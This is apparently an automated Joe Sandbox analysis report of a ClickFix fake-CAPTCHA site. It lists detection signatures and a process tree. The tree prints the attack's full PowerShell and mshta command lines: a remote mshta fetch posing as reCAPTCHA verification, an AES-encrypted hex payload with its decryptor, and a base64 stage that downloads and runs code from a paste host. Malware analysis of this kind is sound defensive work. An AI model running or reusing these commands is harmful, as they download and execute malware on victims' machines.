Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://annavirgili.com

Overview

General Information

Sample URL:http://annavirgili.com
Analysis ID:1573672
Infos:

Detection

CAPTCHA Scam ClickFix
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detect drive by download via clipboard copy & paste
Yara detected CAPTCHA Scam ClickFix
Connects to a pastebin service (likely for C&C)
Encrypted powershell cmdline option found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTML page contains hidden javascript code
HTML page contains obfuscated script src
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Stores files to the Windows start menu directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64_ra
  • svchost.exe (PID: 7100 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • chrome.exe (PID: 5892 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://annavirgili.com/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1984,i,16319034314027490977,6169393010866710073,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • powershell.exe (PID: 1952 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" . \*i*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\*2\m??ta.??? https://yxyz.zyxy.org/MARBI.mp4?u=d4a7bb1a-1651-4566-9e40-7a8a87d785c1 # ? ''I am not a robot - reCAPTCHA Verification ID: 7126'' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 2628 cmdline: "C:\Windows\System32\mshta.exe" https://yxyz.zyxy.org/MARBI.mp4?u=d4a7bb1a-1651-4566-9e40-7a8a87d785c1 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • powershell.exe (PID: 5108 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function WXndL($cIxW){return -split ($cIxW -replace '..', '0x$& ')};$Ggxu = WXndL('7A5B64CCD96D57D64EFE4A812D2BC4BDE9AE1B1E7F65468F80EA3D5B60B7D7C15F2443A3E6237EAB1F9F3E91A5D835EB18A448CE892FC625BA5CB4E7734FA0B152E164A9AE08D0FEF9B18C700BA2C123C96722C862D347993D0AA1AF4AEEBDD9B33579FD0C0E3E8F4ED828B8EBE67830131A567BC4410ED3DE3DB182881AB06E5D1206E78F5AB5BC320CEB0CD1230E202D819C71580B2958CC5C0E8D1B8BD3370ED4F7231F1F5798BCD1F65460270B2E1E6ED59863C8B5F03F81A685BAD5E7B10E0FB9D1E708A9E5C024FA30DDC882FC492E0DF958455665B085A89C33E2271C0460170B1A544FCCC02AAD22554D5904FEDB87E26616ADC6815B78E3F211ECE66EE7D5818C58FD2367560D21420D5A870A96BF6813F16918FD2CAE995E81E5D5EEE764267ADB4E5F453DAC47D2AA762258E397C75CFF7333F5692FC5E25513BAC939EC2D35D580E47B773762AFA92B8C33B29E596DD3C52FB4B99790BC72803AD41F0A8088B6CBED15134D7A3795F91350D8363992E47BC33998786B02F2BC54DEADA79DA25CDD4E8456CDE732FF3D1BD51FFB619BBF4745E1D5B394630DE4C65145A4F40D54FC2FDFFF60DAC2370A34BE793B19A62E7BFB4C17185C1DC5324F37FFB32F313CB1BD87D5ED80FDE6998A2FA6EAE031759049B99236C74EBE0FCAA0366DFBD6D5203BB793793C30DD6C7711F139487A16F956DED2456E89DA6E8075E848518861F83E12FE6B6D9418FC30B86423F75566F6B84368C093B9C427A827CCA5508786A5C0C9C4FDC8098CF6F6387EF1B6779E7520FFA6CB54F1831F4AA87E12F048C0CF6F7626832EEACA8F18970723839BC8DF8E4A95B0792580CB979CFC7127742BFAC8575A87620516BE0330CEEEC026AE6DEF88079288ADA091993D6A1E4095B56E7A4972D51CC3305B770FFD659D6DF1A16842FAB38AB77C79C33863A3DDD3492894F183BE23A2F13E9B123C61AAA62EA17F6E370D5F5455BDCBE40447C979E2071A5E1C73DAB66505D5097B0CE259E3740A4D336C5D9D478B4BDD16372BC7EDFE1881DEA74E5B9CE7264F939FC71C1A404155682C546391908E072FABB77AFA55EF85CF8D463AF296CB5A97F75A04C27BB522CBD6647D3486CE6F1255A20C9F533CBB8E63861054920A4CAC251BCE2877D09D44209DF14F219EFB4C83461ED25DD05A3920BE2B123C394CC75C22C37A1CBE663656DBBC5E092E0B0019D2990501F5747EEBCB04B628410E9A300AEF287CFF0E6891F2F376C686F5FA861C85F88D563CE6DA2BAF185CC7C432FBC4291B50D6C71EC3AF86F793050E7DA9386849A66D23F884A8EBB084B1E52AFD97FC48ED50A9E6127344548B3E1D3FE46A9B700E23523933F2658A2E11359A7801DCFA20518A8C8ECFB897185694E264D854CE8307694F52B05B1F77A162CF1DD6266ACF5A7558C4494FF2E5B813EA6AA2F10A626FA53624CAEFB65B0BEBCCBCE907FC29AFF64D665F48576317019CB117E486DB9344CB12B5A4C8C99244F69A2C044F0C2B1E2C015323E6F2E9963937F86A2F610B470A787592B51B4A8A0AC1BEBCFBA6BDBBAE601BE25E9697ED1F1F6620B93F5E571C3E1A4F0E8C47093BF22DA12E6490B3AC878564D340B19F5614B1B063BD182E6D649D69AFD32FB57DDA451BB8764142FB0F42BE6E0189467BC1CB105D5FB522273E3782FDAA9E79D531A3BB879EA59043A20FED1EB60716386B9AAB98DC3EE64A1E470DA50DAC0026141747D5C0EED0044EC0D0915C02328F86F0BB7D373FB02861150AB1351E5702E10845E364532DF7DA550E8FADD43BC553C286B9362C8D94A1B01CBEED6A0696A644B4B1C4C07D01BE9FFFFE5E695FE16EEBAF8905BD570BE4B36D0F1C07D860553FBE42A1F44FEBF0A667E85D3544FE91FF701BE78DE167BB6758BB19538D1418D9B1403CFBD5C98DC579BAB71C1BA2BFB6A2ED52BC640E9E45881734D627572BBB24767BF9105E290AED4FD0AD07E069C341D94CD9D253482474A2AFEACE895331A6A7C2344244D9883CB83DB04E20F24E807A0C42FAD54148764C3B647F7B86743F03E946F8ABAA4037DF00724040C58C639B64617CEC513964C0AEB7450990964F332CA73B69AE563F357EFE71A45ADB76F5F1F74B9EA094EDB014AF7DE3832D006B489635D35933F45D8722789F646F6B34118D96044BF40BB9C6D5C235CC72225C1E2FF06D17FFCF3119AC497D69763C1EA4752D9DF918E3F7BC1F5DA270F722684C1062428E1B4B4DFAC9D4B8A3AA2FED312CDC55749F56329AABB058B493B229AFE6188C2CD6E5EF7D4615BAC6C376F0A1C60BE569EDE1D7D229C0A409E716C9881B8ED8A6AF7DFF8E51394FE00530F124BF25F72F1BB0C40D8756D4DC53C99C7706F76566458303AD17ABA13977CBB9D9E8E0D6A23C3AC29863BA5C05EC614C2DC13F1D86D3E8B6E32547054893B928DAF467A0E285FEB70CD8521F803FA7DCB6E68597E4F10DC19975F6A9FA3BB73D000E25D904399788A042CCB2A8ACEBC94D9F7176B6C42A8ADF53E078B0DB3D1DB4FA018C20200519D0C6BDAD8C667BC081BB6E98837F869A01FCB4F5BFA3FF6B9DA59A6CC6F14874D12DA9C94A924E23E1C9A2F10B24B2C808A191CAEF430B6BCCDB8ECC67C81EBDF1946F84922DD6237AD44AA75DAE5B417CBC7F1935089D115B32E7BEA92467DF4B34887940BE275A826DCBE8FBCD8572CF31DFF6137DA4FA652F60A4C96E8EE7084DF2015478E3BD67EDD0BDFB00AF09D7DE181E5AA043DE6F0FC38EB1345B172BB996F129E450352658040763C3FD33D898F576ED092EBE78EB3CE7A76AC530782DAFA0D77E713A4D141695047421A84E93C5C6879D829FA96C6E0E217D62FECC4DD0FB16426652883165B9360C91E805AD040FAF4EA2E2740FA5E9E6F3AE24428D754B4AB2A539E552C98664EEC4BE0178F55FEA933EF0A6B79A49D0F87E95E22DDD03EA3EDFBFAABE60356A7A00DA80A4B13179CF6AD7A4055AAFC41FD0B8B3D8EFA93BC1117E123BD77B17F73F8C6E2EE3D01BFDBEEC94A9522C0A1A5E63506CC7F53BB9BC8DF54090B9989982A1686806E7CBC8FFCDD27577A949E1959B8D7B4B07DD342D475CFBCCE589EECF4466070B9CA53B749253301F99A3C0084ABDFB98EB91E40D1B32895AAE86DCA9CA7B851F00477324B25F71DE93C8B9BB13C56A76F42A26ED97C0915187E6F5B6FC54C40843167185BE51622CE24F901B16B435C2DDA0A5401210B6984C5C3BE6C2335BE875BFAA261EB865AD3D047FBD55B975D9733284ABA3143900958E64193E0A4FAEB858C56D772D7108BA4829F9ECAB503E0C6BF8A807447723CA7C4417C128182FE0DC0B420E8B7C1B18A137C48E31AC0E4E723CF849010F8A2937C1D119B207B22A30AB798DB13ACF4BD7E3FEC18AE6693BBD9FFA6017F2BB4A8BCDE923FAD4066B7438E54189066A0E5BE7FD3EA4AD53AE465432AA738EF4A7176ED78829C803418AD7B3FFDF34DA80F24901748099068BAD20F0B6C75D5CBFAE57169CFA3A63A30790041DACF0733B7A61EA68B6DB4BAA3832C2FD159B1181AA974048F90B196471D825E638D56773F684475EB8211E807A21E574D6A5F63D923A169C4621973867E9B1FC18CC72C11E65C8077634918704FBDF878CAD8411014CA1319BCC88017DC5D930D43F0A3AB7E96D711475123876D8DF4F97924CAB0F392C26647152892055A197E9E15E9ADC078BFDF053C973F4F43CF80CC2846AC337DB1CDF4C600FB6B7F44919C555861CEBAD623302738419EF1F8C12A52E4B356B75E6B79DEBB7E9967E592F3D5F9BBEFEA63B88F6545FE25D9BE8AAF6640FC7F9A623282BD4A790F5BF18A8BE05A6D7860997549B97DA3E886EC6FF35A01AF07E844664A44EF19C5476FA04B41688491C9F8396B3D8BC34EF0AE26A77236FE6A64AEC24F73831D893CCC31663593FE27BE686C8BA');$LZbV=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((WXndL('61597869676545424D6F537659656151')),[byte[]]::new(16)).TransformFinalBlock($Ggxu,0,$Ggxu.Length)); & $LZbV.Substring(0,3) $LZbV.Substring(305) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 396 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -ExecutionPolicy UnRestricted -Enc bABzACAAcABhAG4AeQBvACoAOwBTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEUAbQBpACAAJwBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAGcATQBXAEkAcABFAEgATgBWAGkAewBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABEAHYAZwB5AGkASgB4AHUAVAB0ACgAcwB0AHIAaQBuAGcAIAB1AHIAbAApAHsAcgBlAHQAdQByAG4AIAAoAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACgAKQApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAdQByAGwAKQA7AH0AfQAnADsAUwBlAHQALQBWAGEAcgBpAGEAYgBsAGUAIABCAEYAIAAnAGgAdAB0AHAAcwA6AC8ALwBuAG8AcABhAHMAdABlAC4AbgBlAHQALwBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAJwA7ACYAKABHAFYAIABFACoAdABlAHgAKgApAC4AVgBhAGwAdQBlAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQB8AEcATQApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQAuACgAKAAoAEcAVgAgAEUAKgB0AGUAeAAqACkALgBWAGEAbAB1AGUAfABHAE0AKQBbADYAXQAuAE4AYQBtAGUAKQAuAFAAcwBPAGIAagBlAGMAdAAuAE0AZQB0AGgAbwBkAHMAfABXAGgAZQByAGUALQBPAGIAagBlAGMAdAB7ACQAXwAuAE4AYQBtAGUALQBjAGwAaQBrAGUAJwBHACoAZAAnAH0AKQAuAE4AYQBtAGUAKQAuAEkAbgB2AG8AawBlACgAKABHAFYAIABFACoAdABlAHgAKgApAC4AVgBhAGwAdQBlAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQB8AEcATQApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQAuACgAKAAoAEcAVgAgAEUAKgB0AGUAeAAqACkALgBWAGEAbAB1AGUAfABHAE0AKQBbADYAXQAuAE4AYQBtAGUAKQB8AEcATQB8AFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0AHsAJABfAC4ATgBhAG0AZQAtAGMAbABpAGsAZQAnACoAbwBtACoAZQAnAH0AKQAuAE4AYQBtAGUAKQAuAEkAbgB2AG8AawBlACgAJwAqAC0AVAB5ACoAZQAnACwAMQAsADEAKQAsAFsATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBDAG8AbQBtAGEAbgBkAFQAeQBwAGUAcwBdADoAOgBDAG0AZABsAGUAdAApAC0ATABhACAAQwBTAGgAYQByAHAAIAAoAEwAUwAgAFYAYQByAGkAYQBiAGwAZQA6AC8ARQBtAGkAKQAuAFYAYQBsAHUAZQA7ACgAWwBnAE0AVwBJAHAARQBIAE4AVgBpAF0AOgA6AEQAdgBnAHkAaQBKAHgAdQBUAHQAKAAoAEcAVgAgAEIARgAgAC0AVgBhAGwAdQBlAE8AbgBsACkAKQApAHwAJgAoAEcASQAgAEEAbABpAGEAcwA6AEkARQAqACkA MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • csc.exe (PID: 5944 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qwzwa2hv.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 7752 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF57.tmp" "c:\Users\user\AppData\Local\Temp\CSC2CD5A3AC9BED45FD9C1F4AD4196788AE.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • xdd.exe (PID: 7896 cmdline: "C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exe" MD5: 3A19C125224A2DB2843B2A22BFA6705F)
  • cleanup

Yara Signatures

HTML

SourceRuleDescriptionAuthorStrings
1.1.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
    1.2.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Potentially Suspicious PowerShell Child Processes
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\mshta.exe" https://yxyz.zyxy.org/MARBI.mp4?u=d4a7bb1a-1651-4566-9e40-7a8a87d785c1, CommandLine: "C:\Windows\System32\mshta.exe" https://yxyz.zyxy.org/MARBI.mp4?u=d4a7bb1a-1651-4566-9e40-7a8a87d785c1, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" . \*i*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\*2\m??ta.??? https://yxyz.zyxy.org/MARBI.mp4?u=d4a7bb1a-1651-4566-9e40-7a8a87d785c1 # ? ''I am not a robot - reCAPTCHA Verification ID: 7126'', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1952, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" https://yxyz.zyxy.org/MARBI.mp4?u=d4a7bb1a-1651-4566-9e40-7a8a87d785c1, ProcessId: 2628, ProcessName: mshta.exe
      Sigma detected: Suspicious MSHTA Child Process
      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function WXndL($cIxW){return -split ($cIxW -replace '..', '0x$& ')};$Ggxu = WXndL('7A5B64CCD96D57D64EFE4A812D2BC4BDE9AE1B1E7F65468F80EA3D5B60B7D7C15F2443A3E6237EAB1F9F3E91A5D835EB18A448CE892FC625BA5CB4E7734FA0B152E164A9AE08D0FEF9B18C700BA2C123C96722C862D347993D0AA1AF4AEEBDD9B33579FD0C0E3E8F4ED828B8EBE67830131A567BC4410ED3DE3DB182881AB06E5D1206E78F5AB5BC320CEB0CD1230E202D819C71580B2958CC5C0E8D1B8BD3370ED4F7231F1F5798BCD1F65460270B2E1E6ED59863C8B5F03F81A685BAD5E7B10E0FB9D1E708A9E5C024FA30DDC882FC492E0DF958455665B085A89C33E2271C0460170B1A544FCCC02AAD22554D5904FEDB87E26616ADC6815B78E3F211ECE66EE7D5818C58FD2367560D21420D5A870A96BF6813F16918FD2CAE995E81E5D5EEE764267ADB4E5F453DAC47D2AA762258E397C75CFF7333F5692FC5E25513BAC939EC2D35D580E47B773762AFA92B8C33B29E596DD3C52FB4B99790BC72803AD41F0A8088B6CBED15134D7A3795F91350D8363992E47BC33998786B02F2BC54DEADA79DA25CDD4E8456CDE732FF3D1BD51FFB619BBF4745E1D5B394630DE4C65145A4F40D54FC2FDFFF60DAC2370A34BE793B19A62E7BFB4C17185C1DC5324F37FFB32F313CB1BD87D5ED80FDE6998A2FA6EAE031759049B99236C74EBE0FCAA0366DFBD6D5203BB793793C30DD6C7711F139487A16F956DED2456E89DA6E8075E848518861F83E12FE6B6D9418FC30B86423F75566F6B84368C093B9C427A827CCA5508786A5C0C9C4FDC8098CF6F6387EF1B6779E7520FFA6CB54F1831F4AA87E12F048C0CF6F7626832EEACA8F18970723839BC8DF8E4A95B0792580CB979CFC7127742BFAC8575A87620516BE0330CEEEC026AE6DEF88079288ADA091993D6A1E4095B56E7A4972D51CC3305B770FFD659D6DF1A16842FAB38AB77C79C33863A3DDD3492894F183BE23A2F13E9B123C61AAA62EA17F6E370D5F5455BDCBE40447C979E2071A5E1C73DAB66505D5097B0CE259E3740A4D336C5D9D478B4BDD16372BC7EDFE1881DEA74E5B9CE7264F939FC71C1A404155682C546391908E072FABB77AFA55EF85CF8D463AF296CB5A97F75A04C27BB522CBD6647D3486CE6F1255A20C9F533CBB8E63861054920A4CAC251BCE2877D09D44209DF14F219EFB4C83461ED25DD05A3920BE2B123C394CC75C22C37A1CBE663656DBBC5E092E0B0019D2990501F5747EEBCB04B628410E9A300AEF287CFF0E6891F2F376C686F5FA861C85F88D563CE6DA2BAF185CC7C432FBC4291B50D6C71EC3AF86F793050E7DA9386849A66D23F884A8EBB084B1E52AFD97FC48ED50A9E6127344548B3E1D3FE46A9B700E23523933F2658A2E11359A7801DCFA20518A8C8ECFB897185694E264D854CE8307694F52B05B1F77A162CF1DD6266ACF5A7558C4494FF2E5B813EA6AA2F10A626FA53624CAEFB65B0BEBCCBCE907FC29AFF64D665F48576317019CB117E486DB9344CB12B5A4C8C99244F69A2C044F0C2B1E2C015323E6F2E9963937F86A2F610B470A787592B51B4A8A0AC1BEBCFBA6BDBBAE601BE25E9697ED1F1F6620B93F5E571C3E1A4F0E8C47093BF22DA12E6490B3AC878564D340B19F5614B1B063BD182E6D649D69AFD32FB57DDA451BB8764142FB0F42BE6E0189467BC1CB105D5FB522273E3782FDAA9E79D531A3BB879EA59043A20FED1EB60716386B9AAB98DC3EE64A1E470DA50DAC0026141747D5C0EED0044EC0D0915C02328F86F0BB7D373FB02861150AB1351E5702E10845E364532DF7DA550E8FADD43BC553C286B9362C8D94A1B01CBEED6A0696A644B4B1C4C07D01BE9FFFFE5E695FE16EEBAF8905BD570BE4B36D0F1C07D860553FBE42A1F44FEBF0A667E85D3544FE91FF701BE78DE167BB6758BB19538D1418D9B1403CFBD5C98DC579BAB71C1BA2BFB6A2ED52BC640E9E45881734D627572BBB24767BF9105E290AED4FD0A
      Sigma detected: Change PowerShell Policies to an Insecure Level
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function WXndL($cIxW){return -split ($cIxW -replace '..', '0x$& ')};$Ggxu = WXndL('7A5B64CCD96D57D64EFE4A812D2BC4BDE9AE1B1E7F65468F80EA3D5B60B7D7C15F2443A3E6237EAB1F9F3E91A5D835EB18A448CE892FC625BA5CB4E7734FA0B152E164A9AE08D0FEF9B18C700BA2C123C96722C862D347993D0AA1AF4AEEBDD9B33579FD0C0E3E8F4ED828B8EBE67830131A567BC4410ED3DE3DB182881AB06E5D1206E78F5AB5BC320CEB0CD1230E202D819C71580B2958CC5C0E8D1B8BD3370ED4F7231F1F5798BCD1F65460270B2E1E6ED59863C8B5F03F81A685BAD5E7B10E0FB9D1E708A9E5C024FA30DDC882FC492E0DF958455665B085A89C33E2271C0460170B1A544FCCC02AAD22554D5904FEDB87E26616ADC6815B78E3F211ECE66EE7D5818C58FD2367560D21420D5A870A96BF6813F16918FD2CAE995E81E5D5EEE764267ADB4E5F453DAC47D2AA762258E397C75CFF7333F5692FC5E25513BAC939EC2D35D580E47B773762AFA92B8C33B29E596DD3C52FB4B99790BC72803AD41F0A8088B6CBED15134D7A3795F91350D8363992E47BC33998786B02F2BC54DEADA79DA25CDD4E8456CDE732FF3D1BD51FFB619BBF4745E1D5B394630DE4C65145A4F40D54FC2FDFFF60DAC2370A34BE793B19A62E7BFB4C17185C1DC5324F37FFB32F313CB1BD87D5ED80FDE6998A2FA6EAE031759049B99236C74EBE0FCAA0366DFBD6D5203BB793793C30DD6C7711F139487A16F956DED2456E89DA6E8075E848518861F83E12FE6B6D9418FC30B86423F75566F6B84368C093B9C427A827CCA5508786A5C0C9C4FDC8098CF6F6387EF1B6779E7520FFA6CB54F1831F4AA87E12F048C0CF6F7626832EEACA8F18970723839BC8DF8E4A95B0792580CB979CFC7127742BFAC8575A87620516BE0330CEEEC026AE6DEF88079288ADA091993D6A1E4095B56E7A4972D51CC3305B770FFD659D6DF1A16842FAB38AB77C79C33863A3DDD3492894F183BE23A2F13E9B123C61AAA62EA17F6E370D5F5455BDCBE40447C979E2071A5E1C73DAB66505D5097B0CE259E3740A4D336C5D9D478B4BDD16372BC7EDFE1881DEA74E5B9CE7264F939FC71C1A404155682C546391908E072FABB77AFA55EF85CF8D463AF296CB5A97F75A04C27BB522CBD6647D3486CE6F1255A20C9F533CBB8E63861054920A4CAC251BCE2877D09D44209DF14F219EFB4C83461ED25DD05A3920BE2B123C394CC75C22C37A1CBE663656DBBC5E092E0B0019D2990501F5747EEBCB04B628410E9A300AEF287CFF0E6891F2F376C686F5FA861C85F88D563CE6DA2BAF185CC7C432FBC4291B50D6C71EC3AF86F793050E7DA9386849A66D23F884A8EBB084B1E52AFD97FC48ED50A9E6127344548B3E1D3FE46A9B700E23523933F2658A2E11359A7801DCFA20518A8C8ECFB897185694E264D854CE8307694F52B05B1F77A162CF1DD6266ACF5A7558C4494FF2E5B813EA6AA2F10A626FA53624CAEFB65B0BEBCCBCE907FC29AFF64D665F48576317019CB117E486DB9344CB12B5A4C8C99244F69A2C044F0C2B1E2C015323E6F2E9963937F86A2F610B470A787592B51B4A8A0AC1BEBCFBA6BDBBAE601BE25E9697ED1F1F6620B93F5E571C3E1A4F0E8C47093BF22DA12E6490B3AC878564D340B19F5614B1B063BD182E6D649D69AFD32FB57DDA451BB8764142FB0F42BE6E0189467BC1CB105D5FB522273E3782FDAA9E79D531A3BB879EA59043A20FED1EB60716386B9AAB98DC3EE64A1E470DA50DAC0026141747D5C0EED0044EC0D0915C02328F86F0BB7D373FB02861150AB1351E5702E10845E364532DF7DA550E8FADD43BC553C286B9362C8D94A1B01CBEED6A0696A644B4B1C4C07D01BE9FFFFE5E695FE16EEBAF8905BD570BE4B36D0F1C07D860553FBE42A1F44FEBF0A667E85D3544FE91FF701BE78DE167BB6758BB19538D1418D9B1403CFBD5C98DC579BAB71C1BA2BFB6A2ED52BC640E9E45881734D627572BBB24767BF9105E290AED4FD0A
      Sigma detected: Dynamic .NET Compilation Via Csc.EXE
      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qwzwa2hv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qwzwa2hv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -ExecutionPolicy UnRestricted -Enc bABzACAAcABhAG4AeQBvACoAOwBTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEUAbQBpACAAJwBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAGcATQBXAEkAcABFAEgATgBWAGkAewBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABEAHYAZwB5AGkASgB4AHUAVAB0ACgAcwB0AHIAaQBuAGcAIAB1AHIAbAApAHsAcgBlAHQAdQByAG4AIAAoAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACgAKQApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAdQByAGwAKQA7AH0AfQAnADsAUwBlAHQALQBWAGEAcgBpAGEAYgBsAGUAIABCAEYAIAAnAGgAdAB0AHAAcwA6AC8ALwBuAG8AcABhAHMAdABlAC4AbgBlAHQALwBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAJwA7ACYAKABHAFYAIABFACoAdABlAHgAKgApAC4AVgBhAGwAdQBlAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQB8AEcATQApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQAuACgAKAAoAEcAVgAgAEUAKgB0AGUAeAAqACkALgBWAGEAbAB1AGUAfABHAE0AKQBbADYAXQAuAE4AYQBtAGUAKQAuAFAAcwBPAGIAagBlAGMAdAAuAE0AZQB0AGgAbwBkAHMAfABXAGgAZQByAGUALQBPAGIAagBlAGMAdAB7ACQAXwAuAE4AYQBtAGUALQBjAGwAaQBrAGUAJwBHACoAZAAnAH0AKQAuAE4AYQBtAGUAKQAuAEkAbgB2AG8AawBlACgAKABHAFYAIABFACoAdABlAHgAKgApAC4AVgBhAGwAdQBlAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQB8AEcATQApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQAuACgAKAAoAEcAVgAgAEUAKgB0AGUAeAAqACkALgBWAGEAbAB1AGUAfABHAE0AKQBbADYAXQAuAE4AYQBtAGUAKQB8AEcATQB8AFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0AHsAJABfAC4ATgBhAG0AZQAtAGMAbABpAGsAZQAnACoAbwBtACoAZQAnAH0AKQAuAE4AYQBtAGUAKQAuAEkAbgB2AG8AawBlACgAJwAqAC0AVAB5ACoAZQAnACwAMQAsADEAKQAsAFsATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBDAG8AbQBtAGEAbgBkAFQAeQBwAGUAcwBdADoAOgBDAG0AZABsAGUAdAApAC0ATABhACA